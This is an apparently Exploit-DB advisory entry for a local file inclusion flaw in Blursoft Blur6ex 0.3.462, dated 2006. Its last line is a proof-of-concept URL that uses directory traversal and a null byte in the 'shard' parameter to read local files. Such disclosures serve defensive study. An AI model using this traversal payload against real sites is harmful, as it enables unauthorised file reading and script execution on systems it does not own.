Blursoft Blur6ex 0.3.462 - 'index.php' Local File Inclusion

EDB-ID:

27662

CVE:

N/A




Platform:

PHP

Date:

2006-04-17


source: https://www.securityfocus.com/bid/17554/info

Blur6ex is prone to a local file-include vulnerability that may allow an unauthorized user to view files and to execute local scripts.

http://www.example.com/blur6ex-0.3.462/index.php?shard=/../../../../../[local-file]%00